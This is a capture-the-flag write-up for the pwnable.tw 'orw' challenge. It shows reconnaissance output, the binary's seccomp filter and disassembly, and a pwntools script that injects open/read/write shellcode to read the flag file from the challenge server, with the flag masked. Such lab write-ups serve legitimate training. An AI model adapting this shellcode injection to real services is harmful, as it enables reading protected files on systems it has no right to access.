Pwnable.tw - orw Description
Read the flag from /home/orw/flag.
Source https://pwnable.tw/challenge/#2
0x1 Initial Reconnaissance 一樣先觀察這題的一些基本資訊。
file 1 2 └─$ file orw orw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e60ecccd9d01c8217387e8b77e9261a1f36b5030, not stripped
checksec 1 2 3 4 5 6 7 8 9 └─$ checksec orw [*] '/home/kazmatw/pwnable/orw/orw' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments
./orw 1 2 3 └─$ ./orw Give my your shellcode:1234 Segmentation fault
seccomp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 └─$ seccomp-tools dump ./orw line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x09 0x40000003 if (A != ARCH_I386) goto 0011 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x15 0x07 0x00 0x000000ad if (A == rt_sigreturn) goto 0011 0004: 0x15 0x06 0x00 0x00000077 if (A == sigreturn) goto 0011 0005: 0x15 0x05 0x00 0x000000fc if (A == exit_group) goto 0011 0006: 0x15 0x04 0x00 0x00000001 if (A == exit ) goto 0011 0007: 0x15 0x03 0x00 0x00000005 if (A == open) goto 0011 0008: 0x15 0x02 0x00 0x00000003 if (A == read ) goto 0011 0009: 0x15 0x01 0x00 0x00000004 if (A == write) goto 0011 0010: 0x06 0x00 0x00 0x00050026 return ERRNO(38) 0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
disassemble main 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 gef➤ disassemble main Dump of assembler code for function main: 0x08048548 <+0>: lea ecx,[esp+0x4] 0x0804854c <+4>: and esp,0xfffffff0 0x0804854f <+7>: push DWORD PTR [ecx-0x4] 0x08048552 <+10>: push ebp 0x08048553 <+11>: mov ebp,esp 0x08048555 <+13>: push ecx 0x08048556 <+14>: sub esp,0x4 0x08048559 <+17>: call 0x80484cb <orw_seccomp> 0x0804855e <+22>: sub esp,0xc 0x08048561 <+25>: push 0x80486a0 0x08048566 <+30>: call 0x8048380 <printf @plt> 0x0804856b <+35>: add esp,0x10 0x0804856e <+38>: sub esp,0x4 0x08048571 <+41>: push 0xc8 0x08048576 <+46>: push 0x804a060 0x0804857b <+51>: push 0x0 0x0804857d <+53>: call 0x8048370 <read @plt> 0x08048582 <+58>: add esp,0x10 0x08048585 <+61>: mov eax,0x804a060 0x0804858a <+66>: call eax 0x0804858c <+68>: mov eax,0x0 0x08048591 <+73>: mov ecx,DWORD PTR [ebp-0x4] 0x08048594 <+76>: leave 0x08048595 <+77>: lea esp,[ecx-0x4] 0x08048598 <+80>: ret End of assembler dump.
0x2 Exploitation 題目描述說只能使用 open read write,從 seccomp-tools 也能確認這個限制,逆向分析會發現就是很單純的把我們給的 shellcode 拿去執行而已,好像也沒什麼好解釋的,那就直接上 exploit XD。
0x3 Exploit 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 from pwn import *r = remote('chall.pwnable.tw' , 10001 ) sc = asm( shellcraft.i386.linux.open (b'/home/orw/flag' ) + shellcraft.i386.linux.read('eax' , 'esp' , 50 ) + shellcraft.i386.linux.write('1' , 'esp' , 50 ) ) r.sendafter(b':' , sc) flag = r.recvuntil(b'}' ) r.recv() success('Flag: %s' % flag) r.interactive()
Result:
1 2 3 4 5 └─$ python exploit.py [+] Opening connection to chall.pwnable.tw on port 10001: Done [+] Flag: b'FLAG{?????????????????????????}' [*] Switching to interactive mode [*] Got EOF while reading in interactive
0x5 References 可以參考張元在 edu-ctf 上的 how2orw,下面附上影片連結和 writeup:https://www.youtube.com/watch?v=U8N6aE-Nq-Q https://kazma.tw/2023/12/10/Yuawn-Pwn1-orw-Writeup/
Pwned !!!
